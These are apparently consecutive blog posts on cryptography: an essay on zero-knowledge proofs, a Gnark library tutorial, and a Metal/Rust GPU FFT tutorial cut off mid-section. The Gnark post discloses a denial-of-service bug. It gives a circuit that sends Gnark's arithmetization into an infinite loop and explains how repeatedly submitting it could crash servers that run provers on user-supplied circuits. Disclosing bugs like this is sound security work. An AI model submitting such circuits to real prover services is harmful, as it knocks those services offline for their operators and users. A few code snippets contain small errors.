The general public is aware of the big breakthroughs made in the aerospatial industry, energy production, internet of things, and last but not least artificial intelligence. However, most don’t know that during the COVID pandemic, enormous advances were made in cryptography. 47 years ago Diffie and Hellman wrote in their famous cryptography paper: “we stand today on the brink of a revolution in cryptography”, which enabled two people to exchange confidential information even when they can only communicate via a channel monitored by an adversary. This revolution enabled electronic commerce and the communication between citizens of the free world. We believe the discoveries made by researchers and engineers in cryptography during this COVID pandemic will be as important as the discoveries made by Diffie and Hellman in the upcoming decades.</p>
One of the big discoveries has been how to make Zero-Knowledge Proofs fast enough for real-world applications. This technology has been around since 1984 but as Diffie also said, “Lots of people working in cryptography have no deep concern with real application issues. They are trying to discover things clever enough to write papers about”. Fortunately for humanity, researchers and engineers have made this technology practical enough in the last decade (especially the last 2 years) to be useful.</p>
The financial system depends on the existence of intermediaries: an army of auditors, regulators, and accountants. The correct working of the financial machine depends on the integrity of its financial institutions. Integrity is maintained due to positive economic incentives and jail time, fines, and costly lawsuits if the intermediaries don’t do what the state and society expect from them. Bitcoin, a result of the 2008 crisis, created a permissionless financial system where its users can send and receive digital money without intermediaries and without anybody being able to block transactions. In countries like Argentina, Nigeria, or Lebanon, where stagnation and inflation erode its citizens’ trust in the financial system and the state, Bitcoin and stablecoins on top of Ethereum are used on a daily basis by the young population to save and avoid capital controls. In developed countries, its usage is not as massive since the traditional financial system and the state is trusted by most citizens. However, the world is becoming more complex. Banks are failing in the US and Europe, a new war is taking place in Europe, debt levels are not sustainable in many countries, the fight between left and the right is retaking the main stage, tension between the West and the East increases, and technological change keeps accelerating.</p>
New applications built on top of unstoppable and trustless technologies that don’t depend on social trust will grow and thrive in this type of environment. Everything is being questioned. Only things that can’t be questioned will fully resist the passage of time. This will happen not only in developing countries but also in developed ones. Systems like Bitcoin, where everyone can verify how it’s running, are more resilient and become more useful by the day in a world that is getting more complex.</p>
Bitcoin’s focus has been to become a new type of monetary asset and financial network. For this reason, the development of more complex programs on top of Bitcoin has always been restricted by design. Newer blockchains like Ethereum added the ability to create new types of applications. DeFi Protocols that enabled lending and borrowing, exchange of digital currencies and the ability to buy, sell and trade digital collectives and arts rapidly grew on top of Ethereum. However the cost of creating and transferring relevant amounts of assets in blockchains is costly. The ability to create more complex applications that sit on top of blockchains is also very limited. Applications can’t run more than a few milliseconds on Ethereum.</p>
These systems do not rely on social integrity like traditional systems. Instead, they operate as a permissionless and censorship-resistant network, allowing anyone to add a node and submit updates to its state. To ensure verification, each node must re-execute all transactions, which makes the system decentralized and secure, albeit slower than centralized systems. Consequently, this imposes a limitation on the types of applications that can be built on blockchains. Applications requiring frequent database state updates, such as those exceeding a few times per second, or machine learning algorithms, are not feasible on blockchain platforms.</p>
This is where Zero Knowledge Proofs (ZKPs) and other cryptographic and distributed systems primitives will help society create tools that can be used by everyone. ZKPs enable a party to demonstrate a statement to other parties without revealing any information beyond the proof. In more concrete terms, this enables a person to show another person that the computation they did is correct without having to redo it and without even having to grant access to the data that was used. An important aspect of this is that the verification is done in a much faster time than the proving. In even simpler terms, it proves that the output of a certain computation is correct. The verification is way easier and faster to do than the execution or proving. Anybody can check the proof, and this saves computing time and money.</p>
At the beginning it’s difficult to grasp, even for engineers, that such a technology is even possible. The mathematics behind it, until recently, seemed magical, and that’s why it was called moon math. Thanks to ZKPs, transferring money in blockchains similar to Bitcoin is cheaper and way faster since there is no need to re-execute each transaction by each node. Only one node is needed to process all the transactions and prove them using a ZKPs, while the rest simply need to verify it, saving valuable computing resources. Among other things, ZKPs enable creating a financial system that doesn’t depend on social trust like traditional finance and that doesn’t depend as much on re-executing algorithms as Bitcoin.</p>
Zero Knowledge Proofs facilitate the development of an entirely new range of applications that are executed and proven on a single computer outside the blockchain, with verification occurring within Ethereum. The verification cost is way cheaper than the time it takes to prove or execute it. Ethereum will evolve from a slow yet secure distributed mainframe, where execution time is shared among all users to run small programs, into a distributed computer that stores and verifies proofs generated externally from the blockchain.</p>
Not only will blockchains benefit from the development of new cryptographic primitives like Zero Knowledge Proofs (ZKPs), but other areas will also be significantly impacted. As AI-generated content begins to overshadow human-generated content on the internet, ZKPs will become essential for verifying that such content was produced by unbiased AI models. “Proof of humanity” systems are already employing ZKPs to ensure the accurate computation of a human accessing specific resources.</p>
Hardware is another area where ZKPs will make an impact. Similar to how graphics cards in the 1990s revolutionized the video game industry, zero-knowledge hardware acceleration will be integrated into computers to enhance efficiency.</p>
ZKPs can also be utilized to balance storage and computation securely. For instance, security cameras generate vast amounts of data. ZKPs can provide a compact proof that AI models did not detect any critical information in the video, allowing the system to delete the footage and save storage space.</p>
ZKPs will even be used for national security purposes. As energy production shifts from centralized power plants to distributed sources like solar panels and wind turbines, verifying the proper execution of software on their controllers becomes vital. In the coming decades, ZKPs will play a crucial role in securing these devices.</p>
Software industry regulations are inevitable, and industries such as online casinos and ad networks using Real-Time Bidding protocols will be legally required to demonstrate that they have not deceived their clients. Laws protecting users from large tech corporations are already in place in Europe, partly due to concerns about data misuse by foreign powers to influence political campaigns.</p>
Requirements for secure storage and processing of encrypted data will become increasingly necessary. Fully Homomorphic Encryption (FHE), a technology akin to ZKPs, will be one of the tools utilized for this purpose. FHE enables computation on encrypted data, ensuring privacy. As FHE becomes more efficient and practical, most databases will integrate some FHE functionality, preventing administrators from accessing user data directly.</p>
Zero-knowledge proofs (ZKPs), which generate evidence for a third party to confirm the accurate execution of a computation, and Fully Homomorphic Encryption (FHE), which enables calculations on encrypted data, will be combined with distributed systems algorithms that are capable of tolerating significant network failures similar to those employed by Bitcoin. Together they will be utilized to comply with regulations while creating trustless applications.</p>
In the past decade, we have successfully launched applications serving dozens of millions of users. Leveraging our expertise, we are now dedicated to providing both technical and financial support to help others create startups focused on developing and implementing these vital technologies. As society grapples with the challenges of our rapidly evolving world these innovations will prove to be indispensable.</p>
Federico Carrone.</p>


How to use the Consenys's Gnark Zero Knowledge Proof library and disclosure of a DoS bug
Unknown — Fri, 17 Mar 2023 00:00:00 +0000
Zero Knowledge Proofs (ZKP) are a powerful cryptographic technique that allows two parties to exchange information without revealing any sensitive data. This method has the potential to revolutionize the way we handle privacy and security in various industries, such as finance, healthcare, and government. However, developing ZKP applications has traditionally been a challenging task, requiring a deep understanding of cryptography, programming, and mathematics.</p>
Fortunately, with the advancement of technology and the development of new libraries and frameworks, writing ZKP applications has become much easier. Nowadays, there are several libraries available that can significantly reduce the complexity of developing ZKP applications, such as LambdaWorks</a>, Arkworks</a>, and Gnark</a>. These libraries provide developers with a set of tools and building blocks that simplify the implementation of complex cryptographic protocols.</p>
In this post, we will focus on reviewing Gnark, one of the most powerful and user-friendly libraries available for ZKP development. Gnark is an open-source library that provides developers with a high-level programming language and a set of tools to build efficient and secure ZKP applications. We will explore the features and benefits of gnark and show how it can simplify the process of building ZKP applications.</p>
What is Gnark</h2>
Gnark, written in Go, is a fast ZK-SNARK library that offers both a high-level API and a low-level API to design circuits. The library is open-source and developed under the Apache 2.0 license.</p>
Why Gnark</h2>
We are using Gnark as a backend for Noir</a>. Noir is a domain-specific language for creating and verifying proofs. Noir compiles to an intermediate language which itself can be compiled to an arithmetic circuit or a rank-1 constraint system. This in itself brings up a few challenges within the design process but allows one to decouple the programming language completely from the backend. This is similar in theory to LLVM.</p>
ZK with Gnark</h2>
The main flow for generating a ZK-Proof and verifying it would be:</p>
    1. Arithmetization: This is generating the R1CS or Sparse R1CS circuit with its constraints.</span></span>
    2. Generate a proof of execution for this circuit, given some public and private variables.</span></span>
    3. Verify said proof with the same public inputs used when generating the proof.</span></span></code></pre>
Gnark has both a high level API and a low level API. The main difference relies in the arithmetization. In the high level API you, as a user, are abstracted from the R1CS</code> or SparseR1CS</code> building and in the low level API you need to build them by hand (constraint by constraint).</p>
In the following sections we’re going to explain and show some example usage of the high level and the low level APIs. We’ll start showing the bright side of Gnark which is the high level API.</p>
(Always look on) the bright side</h2>
</p>
High-level API</h3>
Gnark’s high level API lives in the frontend</code> package, you could find it in the root of the repo.</p>
Earlier we said that the main difference relies in the arithmetization, but what does this mean? How so? By arithmetization we basically mean building the circuit with which you’re going to generate your proof.</p>
In the case of the frontend</code> package, building a circuit means to create your circuit struct which fields must be the variables of the circuit (a.k.a. circuit inputs) labeled as public or secret (not labeled fields are assumed secret variables by default). These inputs must be of type frontend.Variable</code> and make up the witness. The witness has a secret part known to the prover only and a public part known to the prover and the verifier.</p>
After you have your circuit structure built you need to define the circuits behaviour. You must do this writing a Define</code> function. Define</code> declares the circuit logic. The compiler then produces a list of constraints which must be satisfied (a valid witness) in order to create a valid ZK-SNARK. The circuit in the example below proves the factorisation of the RSA-250 challenge.</p>
Example: RSA (from gnark’s playground</a>)</h4>
type Circuit struct {</span></span>
    P   frontend.Variable // p  --> secret visibility (default)</span></span>
    Q   frontend.Variable `gnark:"q,secret"` // q  --> secret visibility</span></span>
    RSA frontend.Variable `gnark:",public"`  // rsa  --> public visibility</span></span>
}</span></span>
</span>
func (circuit *Circuit) Define(api frontend.API) error {</span></span>
    // ensure we don't accept RSA * 1 == RSA</span></span>
    api.AssertIsDifferent(circuit.P, 1)</span></span>
    api.AssertIsDifferent(circuit.Q, 1)</span></span>
</span>
    // compute P * Q and store it in the local variable res.</span></span>
    rsa := api.Mul(circuit.P, circuit.Q)</span></span>
</span>
    // assert that the statement P * Q == RSA is true.</span></span>
    api.AssertIsEqual(circuit.RSA, rsa)</span></span>
    return nil</span></span>
}</span></span></code></pre>(Join) the dark side</h2>
</p>
Low-level API</h3>
Located in the constraint</code> module at the root of the repo, we can find almost everything that we need to write an R1CS (for Groth16) or a Sparse R1CS for (Plonk) “by hand”. By hand we mean to build our circuit constraint by constraint. I said almost earlier because we’ll also need some stuff from the gnark-crypto</code> library (provides elliptic curve and pairing-based cryptography and various algorithms of particular interest to zero knowledge proof systems).</p>
We say that the arithmetization here is by hand because both the circuit structure and the constraints need to be writen manually.</p>
To add the circuit inputs you have the methods AddPublicVariable</code>, AddSecretVariable</code> and AddInternalVariable</code>. Calling this methods will return an index which corresponds to the concrete value of that variable in the witness vector. The order in which you all these matters in the way that an internal current witness index (in the circuit that you’re building) is being mutated.</p>
The circuit behaviour, which in the high-level API must be written in the Define</code> function abstracted from the manual constraint generation, is defined constraint by constraint with the method AddConstraint</code>. A constraint can be built initializing a constraint.R1C</code> (in case of Groth16) or a constraint.SparseR1C</code> (in the case of Plonk) term by term. Finally, terms can be created using the MakeTerm</code> method.</p>
After this, the next steps (proving and verifying) are the same as in the high level API.</p>
Example: proving that $x \cdot y = z$</h4>
The next piece of code that proves that $x \cdot y = z$ where $x, z$ are public variables and $y$ a private variable (witness):</p>
func Example() {</span></span>
    // [Y, Z]</span></span>
    publicVariables := []fr_bn254.Element{fr_bn254.NewElement(2), fr_bn254.NewElement(6)}</span></span>
    // [X]</span></span>
    secretVariables := []fr_bn254.Element{fr_bn254.NewElement(3)</span></span>
</span>
    /* R1CS Building */</span></span>
</span>
    // (X * Y) == Z</span></span>
    // X is secret</span></span>
    // Y is public</span></span>
    // Z is public</span></span>
    r1cs := cs_bn254.NewR1CS(1)</span></span>
</span>
    // Variables</span></span>
    _ = r1cs.AddPublicVariable("1") // the ONE_WIRE</span></span>
    Y := r1cs.AddPublicVariable("Y")</span></span>
    Z := r1cs.AddPublicVariable("Z")</span></span>
    X := r1cs.AddSecretVariable("X")</span></span>
</span>
    // Coefficients</span></span>
    COEFFICIENT_ONE := r1cs.FromInterface(1)</span></span>
</span>
    // Constraints</span></span>
    // (1 * X) * (1 * Y) == (1 * Z)</span></span>
    constraint := constraint.R1C{</span></span>
        L: constraint.LinearExpression{r1cs.MakeTerm(&COEFFICIENT_ONE, X)}, // 1 * X</span></span>
        R: constraint.LinearExpression{r1cs.MakeTerm(&COEFFICIENT_ONE, Y)}, // 1 * Y</span></span>
        O: constraint.LinearExpression{r1cs.MakeTerm(&COEFFICIENT_ONE, Z)}, // 1 * Z</span></span>
    }</span></span>
    r1cs.AddConstraint(constraint)</span></span>
</span>
    constraints, r := r1cs.GetConstraints()</span></span>
</span>
    for _, r1c := range constraints {</span></span>
        fmt.Println(r1c.String(r))</span></span>
    }</span></span>
</span>
    /* Universal SRS Generation */</span></span>
</span>
    pk, vk, _ := groth16.Setup(r1cs)</span></span>
</span>
    /* Proving */</span></span>
</span>
    rightWitness := buildWitnesses(r1cs, publicVariables, secretVariables)</span></span>
</span>
    p, _ := groth16.Prove(r1cs, pk, rightWitness)</span></span>
</span>
    /* Verification */</span></span>
</span>
    publicWitness, _ := rightWitness.Public()</span></span>
</span>
    verifies := groth16.Verify(p, vk, publicWitness)</span></span>
</span>
    fmt.Println("Verifies with the right public values :", verifies == nil)</span></span>
</span>
    wrongPublicVariables := []fr_bn254.Element{fr_bn254.NewElement(1), fr_bn254.NewElement(5)}</span></span>
    wrongWitness := buildWitnesses(r1cs, wrongPublicVariables, secretVariables)</span></span>
    wrongPublicWitness, _ := wrongWitness.Public()</span></span>
    verifies = groth16.Verify(p, vk, wrongPublicWitness)</span></span>
</span>
    fmt.Println("Verifies with the wrong public values :", verifies == nil)</span></span>
}</span></span></code></pre>
For you to be able to run this, you’ll need the buildWitness</code> function:</p>
func buildWitnesses(r1cs *cs_bn254.R1CS, publicVariables fr_bn254.Vector, privateVariables fr_bn254.Vector) witness.Witness {</span></span>
    witnessValues := make(chan any)</span></span>
</span>
    go func() {</span></span>
        defer close(witnessValues)</span></span>
        for _, publicVariable := range publicVariables {</span></span>
            witnessValues <- publicVariable</span></span>
        }</span></span>
        for _, privateVariable := range privateVariables {</span></span>
            witnessValues <- privateVariable</span></span>
        }</span></span>
    }()</span></span>
</span>
    witness, err := witness.New(r1cs.CurveID().ScalarField())</span></span>
    if err != nil {</span></span>
        log.Fatal(err)</span></span>
    }</span></span>
</span>
    // -1 because the first variable is the ONE_WIRE.</span></span>
    witness.Fill(r1cs.GetNbPublicVariables()-1, r1cs.GetNbSecretVariables(), witnessValues)</span></span>
</span>
    return witness</span></span>
}</span></span></code></pre>A small bug</h3>
There’s a minor detail when using the low-level API that you have to take into account. Maybe you’ve noticed it but if not, take a look at this line in the example above:</p>
_ = r1cs.AddPublicVariable("1") // the ONE_WIRE</span></span></code></pre>
You’re probably wondering why this is necessary if we are not using the variable returned by the function. Well, we like to code so, let’s remove the line and the patch for this in the buildWitness</code> function (for this patch, remove the -1 in the witness.Fill</code> line of the function) execute the code.</p>
When doing that you’ll get this error:</p>
18:32:36 ERR error="invalid witness size, got 3, expected 2 = 1 (public) + 1 (secret)" backend=groth16 nbConstraints=1</span></span></code></pre>
The error says that we are specting 2 variables (1 public and 1 private) when this is wrong. We’ve already declared 3 variables (2 public and 1 private).</p>
The reason why this happens and why the patch works is beyond the scope of this post but it’s a gnark’s implementation detail that leaked into the API. You can read more about that in this issue</a>.</p>
Infinite loop during the arithmetization</h2>
We found a small bug in the arithmetization code.</p>
Let’s modify a little bit our earlier Groth16’s example and</p>
func Example() {</span></span>
    // [Y, Z]</span></span>
    publicVariables := []fr_bn254.Element{fr_bn254.NewElement(2), fr_bn254.NewElement(5)}</span></span>
    // [X]</span></span>
    secretVariables := []fr_bn254.Element{fr_bn254.NewElement(5)}</span></span>
</span>
    /* R1CS Building */</span></span>
</span>
    // (X * Y) == Z + 5</span></span>
    // X is secret</span></span>
    // Y is public</span></span>
    // Z is public</span></span>
    // 5 is constant</span></span>
    r1cs := cs_bn254.NewR1CS(1)</span></span>
</span>
    // Variables</span></span>
    _ = r1cs.AddPublicVariable("1") // the ONE_WIRE</span></span>
    Y := r1cs.AddPublicVariable("Y")</span></span>
    Z := r1cs.AddPublicVariable("Z")</span></span>
    X := r1cs.AddSecretVariable("X")</span></span>
</span>
    // Constants</span></span>
    FIVE := r1cs.FromInterface(5)</span></span>
    CONST_FIVE_TERM := r1cs.MakeTerm(&FIVE, 0)</span></span>
    CONST_FIVE_TERM.MarkConstant()</span></span>
    </span></span>
    // Coefficients</span></span>
    COEFFICIENT_ONE := r1cs.FromInterface(1)</span></span>
</span>
    // Constraints</span></span>
    // (1 * X) * (1 * Y) == (1 * Z) + (5 * 1)</span></span>
    constraint := constraint.R1C{</span></span>
        L: constraint.LinearExpression{r1cs.MakeTerm(&COEFFICIENT_ONE, X)}, // 1 * X</span></span>
        R: constraint.LinearExpression{r1cs.MakeTerm(&COEFFICIENT_ONE, Y)}, // 1 * Y</span></span>
        O: constraint.LinearExpression{</span></span>
            r1cs.MakeTerm(&COEFFICIENT_ONE, Z)}, // 1 * Z 1</span></span>
            CONST_FIVE_TERM, // 5</span></span>
    }</span></span>
    r1cs.AddConstraint(constraint)</span></span>
</span>
    constraints, r := r1cs.GetConstraints()</span></span>
</span>
    for _, r1c := range constraints {</span></span>
        fmt.Println(r1c.String(r))</span></span>
    }</span></span>
</span>
    /* Universal SRS Generation */</span></span>
</span>
    pk, vk, _ := groth16.Setup(r1cs)</span></span>
</span>
    /* Proving */</span></span>
</span>
    rightWitness := buildWitnesses(r1cs, publicVariables, secretVariables)</span></span>
</span>
    p, _ := groth16.Prove(r1cs, pk, rightWitness)</span></span>
</span>
    /* Verification */</span></span>
</span>
    publicWitness, _ := rightWitness.Public()</span></span>
</span>
    verifies := groth16.Verify(p, vk, publicWitness)</span></span>
</span>
    fmt.Println("Verifies with the right public values :", verifies == nil)</span></span>
</span>
    wrongPublicVariables := []fr_bn254.Element{fr_bn254.NewElement(1), fr_bn254.NewElement(5)}</span></span>
    wrongWitness := buildWitnesses(r1cs, wrongPublicVariables, secretVariables)</span></span>
    wrongPublicWitness, _ := wrongWitness.Public()</span></span>
    verifies = groth16.Verify(p, vk, wrongPublicWitness)</span></span>
</span>
    fmt.Println("Verifies with the wrong public values :", verifies == nil)</span></span>
}</span></span></code></pre>
At first glance it looks like this should work smoothly, but give it a try and run it. Noticed something wrong? If you tried it your answer’d be yes, because after a while you’ll end up with a signal: killed</code> message.</p>
No problem, let’s fix it. Simply remove the following line:</p>
CONST_FIVE_TERM.MarkConstant()</span></span></code></pre>
The difference is just one line; we are making the same as above, only we are not marking the constant term as constant.</p>
The problem</h2>
If you run the fix above, you’ll see that execution finishes successfully and everyone is happy. Well, not so fast fren. This means you, as a Gnark user, can bypass the issue and build a working circuit. A malicious user, however, can still create faulty circuits that break execution.</p>
With this exploit, a server running a Gnark prover that accepts arbitrary circuits (Noir and Aleo Instructions are one example of languages that allow this behaviour to happen) can be brought down through a DDoS attack. A user can repeatedly send the faulty circuit shown above for execution, wasting cycles and forcing crashes over and over.</p>
Conclusion</h2>
Gnark is from our point of view one of the best for developing ZKP applications with a lot of pros and cons, depending on what you want to do. In general if you want to develop ZKP apps the high-level API would be good enough for you. In our case, we needed to go a little deeper and because of that we found some flaws.</p>
So if you’re interested in learning more about how to develop ZKP applications using Gnark, stay tuned for our upcoming blog post. We will provide you with a step-by-step guide and show you how easy it can be to build powerful and secure ZKP applications using this amazing library.</p>


Using Metal and Rust to make FFT even faster
Unknown — Fri, 17 Mar 2023 00:00:00 +0000
A couple of months ago, we wrote about CUDA</a>, a programming model developed by NVIDIA to accelerate expensive computations. We explained why, in the context of ZK-SNARKs</a>, it is useful for performing large multiplications.</p>
Today, we want to discuss another development kit that provides an interface to communicate with the Graphics Processing Unit (GPU) called Metal. Metal was developed by Apple as an alternative for running code on GPUs in Mac systems. It provides its own programming language, called Metal Shading Language (MSL), for writing programs that can be executed by the GPU. Additionally, Metal provides an API designed for Swift or Objective-C to run functions written in MSL and manage resources between the CPU and GPU. In this post, we will use a Rust</a> wrapper of this API called Metal-rs</a>.</p>
At the time of writing this post, we are building Lambdaworks</a>, a library that makes it easy to program ZK-SNARKs. One of the essential operations required for using ZK-SNARKs is multiplication of polynomials that are of very high order. We can solve these operations efficently by using the Fast Fourier Transform (FFT) algorithm, which improves the complexity from $O(N^2)$ to $O(N log N)$ ($N$ being the order of the polynomial). Additionally, parallelizing all the work of this algorithm in the GPU could lead to even better results when working with these large polynomials. So that is our end goal.</p>
The goal of this post is to learn the basics of MSL and see how to do simple computations with it. Then, we will provide a general overview of what is needed to implement FFT on the GPU. We will use the Rust Language to execute these functions and manage the resources between the CPU and GPU.</p>
Metal Structures</h2>
Metal has some general structures for facilitating communication between the CPU and GPU. To create structures in the app, which can then be passed to the GPU for executing a function, there are some necessary steps. Let’s take a look at how they work.</p>
Metal Thread Hierarchy</h3>
The basic idea behind parallel computation in the GPU is to run a massive amount of threads organized in different structures. Each thread is responsible for executing a portion of the overall computation, and all of these threads run simultaneously.</p>
In our previous post about CUDA, we covered in detail how threads are organized</a>, and Metal’s thread structure is quite similar. To help you understand how it works, we’ll give a brief recap, but if you want to learn more, you can check out that section.</p>
Threads are identified in a grid by a coordinate system that depends on the dimensions of the grid. For a 2D grid, the coordinate system would be (x, y). Threads are primarily grouped in threadgroups, which are further divided into Warps or SIMD groups. Threads in a warp execute the same instructions concurrently</strong> on different data, meaning that if a single thread in the warp were to diverge</em> (e.g. because of an if statement) then the whole warp will execute both branches and hurt performance</p>
Understanding this structure is essential when deciding how to split computations between threadgroups and which sizes to use for each group. We’ll provide more detail on this topic when we cover some basic examples.</p>
Metal Device</h3>
The core of the Metal API is the Device, which is an abstraction that represents a GPU in code. You can identify different GPUs and use them for different purposes, but for simplicity’s sake, we’ll just use the default and let Metal automatically select the GPU from our system.</p>
Command Queue</h3>
In addition to the Device, another essential object to use in Metal is the Command Queue. This represents a basic queue that receives commands, such as packages for execution on the GPU. It’s called a queue because it has a specific order in which things are executed. The command queue not only receives our inputs and functions for execution, but also a lot of other things that are necessary for Metal to work.</p>
Command Buffers</h3>
When we talked about “packages” while explaining the Command Queue, we were actually referring to Command Buffers. These buffers work as storage for the functions and computations that we want to execute on the GPU. They don’t run the computations when they are created, but when they are pushed to the Command Queue. There are a few Command Buffers for different types of actions, but the ones that we are interested in are the compute commands.</p>
Pipeline State</h3>
This structure represents the GPU state that needs to be set for a specific command. It is initialized with a specific library, which is basically all the code written in MSL that we want to run, and provides all the necessary steps for the GPU to execute it.</p>
Encoders</h3>
For each type of command that we want to run on the GPU using Metal, we use a dedicated type of encoder. However, all encoders serve the same purpose of creating a package that will be our command buffer. The encoder takes all the arguments of the function that we want to run, as well as its arguments and the pipeline state, and creates a package that will be executed on the GPU. One encoder can be used to create multiple commands, which will be packaged in the same command buffer.</p>
It is important to inform Metal when we have finished encoding all the commands, so that it can push all the created buffers to the queue. We can summarize all these new structures and how they communicate with the following diagram:</p>
</p>
To better understand how all these structures work together, it is helpful to see some basic examples.</p>
Programming in MSL and Rust</h2>
For the first example we will compute a basic product between arrays.</p>
First let see how our function looks in MSL:</p>
dotprod.metal</code></em></p>
[[kernel]]</span></span>
void dot_product(</span></span>
  constant uint *inA [[buffer(0)]],</span></span>
  constant uint *inB [[buffer(1)]],</span></span>
  device uint *result [[buffer(2)]],</span></span>
  uint index [[thread_position_in_grid]])</span></span>
{</span></span>
  result[index] = inA[index] * inB[index];</span></span>
}</span></span></code></pre>
GPU programs are typically referred to as shaders which contain functions of different types. The kernel</code> keyword in this context means that this is a compute function</strong> (made for running parallel computations) and makes it accessible from our Rust code. Since we are working with a kernel, we can specify which kind of thread grid it will run on.</p>
Some arguments can be in different address spaces, constant</code> and device</code> in our case. Data in the device</code> space is available for the device’s (another way to call the GPU) to read and write into. Data in the constant</code> space is read-only.</p>
You may notice that the function does not contain a for</code> loop or any similar iteration to execute the product on the array. This is because multiple threads will work in parallel, executing this operation on different positions of the arrays. When we define the dimensions of our grid and the number of threads to use, each thread is assigned a specific position (the index</code> parameter) to execute the task simultaneously. We use this for indexing, mapping one thread to one element in both arrays.</p>
Lastly, the [[buffer(id)]]</code> is an attribute which identifies that a kernel argument points to a specific buffer</code>, which is a collection of data in memory that can be shared between the CPU and the GPU. When we define these buffers (on our main app), we set an index for the GPU to create a pointer to the buffer and use it accordingly. The 0, 1, 2 refer to the indexes of the different buffers that we want the kernel to access. To simplify this further, we create the arrays in the Rust code and then copy them to the buffers. The GPU uses these indexes to know where to read and write. Although the attributes are not necessary (buffers will be maped to arguments in order), it’s a best practice to use them.</p>
Okay, that’s it for the MSL part, so let’s switch to Rust.</p>
First we have to declare our Device, that is our abstraction of the GPU in the code.</p>
let device: &DeviceRef = &Device::system_default().expect("No device found");</span></span></code></pre>
In this case we let Metal assign a default GPU to use.</p>
Next, we need to reference the function written in MSL. For that, we need to compile our .metal</code> code to generate a .metallib</code> file that will be the library that our Rust code will use. To compile our metal file, we need to run the following command:</p>
xcrun -sdk macosx metal -c dotprod.metal -o dotprod.air</span></span>
xcrun -sdk macosx metallib dotprod.air -o dotprod.metallib</span></span></code></pre>

You’ll need Xcode tools for this, you can see how to install it here</a>.</p>
</blockquote>
Actually, this command will create two new files:</p>
    * One with `.air` extension which is an intermidiate language that apple recommends to compile first.</span></span>
    * The `.metallib` file that will contain our compiled MSL library.</span></span></code></pre>
Now, we can include the new lib in our Rust code</p>
const LIB_DATA: &[u8] = include_bytes!("dotprod.metallib");</span></span></code></pre>
And get a reference to the lib and our function</p>
let lib = device.new_library_with_data(LIB_DATA).unwrap();</span></span>
let function = lib.get_function("dot_product", None).unwrap();</span></span></code></pre>
Now that we have our metal lib and the function that we want to execute, we can create the Pipeline</p>
let pipeline = device</span></span>
    .new_compute_pipeline_state_with_function(&function)</span></span>
    .unwrap();</span></span></code></pre>
Next, we declare all the buffers. These buffers are copies of the structures created in Rust (arrays v</code> and w</code>) of the portion of memory that is shared between the CPU and the GPU.</p>
let length = v.len() as u64;</span></span>
let size = length * core::mem::size_of::<u32>() as u64;</span></span>
</span>
let buffer_a = device.new_buffer_with_data(</span></span>
    unsafe { mem::transmute(v.as_ptr()) }, // bytes</span></span>
    size, // length</span></span>
    MTLResourceOptions::StorageModeShared, // Storage mode</span></span>
);</span></span>
</span>
let buffer_b = device.new_buffer_with_data(</span></span>
    unsafe { mem::transmute(w.as_ptr()) },</span></span>
    size,</span></span>
    MTLResourceOptions::StorageModeShared,</span></span>
);</span></span>
let buffer_result = device.new_buffer(</span></span>
    size, // length</span></span>
    MTLResourceOptions::StorageModeShared, // Storage mode</span></span>
);</span></span></code></pre>
We’re dealing with two arrays of u32</code> data type, so the first thing to do is get the size in bytes of both arrays. When using the new_buffer_with_data()</code> method, we’re essentially creating a buffer that copies the data we’re pointing to (the transmute()</code> function reinterprets a *u32</code> raw pointer into a *c_void</code>). Finally, we define the storage mode. There are a few modes available for different purposes, but for this case, we use the Shared mode, which simply creates a buffer in the system memory that is accessible from both GPU and CPU. We want buffer_result</code> to be an empty buffer, so we only need to specify its size.</p>
Now, we create the rest of our structures</p>
let command_queue = device.new_command_queue();</span></span>
</span>
let command_buffer = command_queue.new_command_buffer();</span></span>
</span>
let compute_encoder = command_buffer.new_compute_command_encoder();</span></span>
compute_encoder.set_compute_pipeline_state(&pipeline);</span></span>
compute_encoder.set_buffers(</span></span>
    0, // start index</span></span>
    &[Some(&buffer_a), Some(&buffer_b), Some(&buffer_result)], //buffers</span></span>
    &[0; 3], //offset</span></span>
);</span></span></code></pre>
Note that we define the index of our buffers in the offset parameter when we call set_buffers</code>. That indexing is what the GPU uses to know where the resource is that it has to use. This is exactly the same as</p>
compute_encoder.set_buffer(0, Some(&buffer_a), 0);</span></span>
compute_encoder.set_buffer(0, Some(&buffer_b), 1);</span></span>
compute_encoder.set_buffer(0, Some(&buffer_result), 2);</span></span></code></pre>
Now is the time to set up the grid and threads that will be used in our function:</p>
let grid_size = metal::MTLSize::new(</span></span>
    length, //width</span></span>
    1, // height</span></span>
    1); //depth</span></span>
</span>
let threadgroup_size = metal::MTLSize::new(</span></span>
    length, //width</span></span>
    1, // height</span></span>
    1); //depth;</span></span>
</span>
compute_encoder.dispatch_threads(grid_size, threadgroup_size);</span></span></code></pre>
As shown in the snippet above, the grid has a width, height and depth, just like the threadgroup. For this example, we can think of having a one dimensional grid that is our array, with the width being the length of the array. With this sizes we will have one thread per element in our array, which is exactly what we need, considering that each thread will execute a product between two elements. After all that, we simply dispatch the threads to the encoder.</p>
That concludes the encoding and all the resources we need to be able to execute the task on the GPU, so now we can commit.</p>
compute_encoder.end_encoding();</span></span>
command_buffer.commit();</span></span>
command_buffer.wait_until_completed();</span></span></code></pre>
The function wait_until_completed()</code> is needed to get the results of the program but consider that the CPU will stop executing things until the GPU is finished with the task. This may not be the best solution in some cases and you may prefer to run another function after the buffer work is done via command_buffer.add_completed_handler()</code>.</p>
If we want to check that the multiplication was done right in the GPU, we need access to the content of our buffer_result</code>.</p>
let ptr = buffer_result.contents() as *const u32;</span></span>
let len = buffer_result.length() as usize / mem::size_of::<u32>();</span></span>
let slice = unsafe { slice::from_raw_parts(ptr, len) };</span></span></code></pre>
We get the pointer to the memory location of the result buffer and the exact length of the buffer to get all the elements of our array. Using that pointer with the calculated length, we can get a slice</code> with the multiplied elements.</p>
All the code for this example can be found in this Metal Playground repository</a>.</p>
Learning FFT</h2>
We learned how all the communication with the GPU works, so now we want to see what exactly the FFT algorithm is, and why it is a great candidate to be executed on the GPU.</p>
DFT and how FFT speed things up</h3>
To begin, let’s discuss another widely used algorithm in the field of physics that is closely related to FFT - the Discrete Fourier Transform (DFT).</p>
In brief, the DFT algorithm is a mathematical operation that converts a sequence of complex numbers into another sequence of complex numbers. For our specific use case, we are interested in how we can perform faster polynomial multiplication. As multiplying two polynomials involves computing the product of each pair of coefficients and adding the resulting terms with the same degree, it requires $O(N^2)$ operations for two polynomials of degree $N$. We can do better than that.</p>
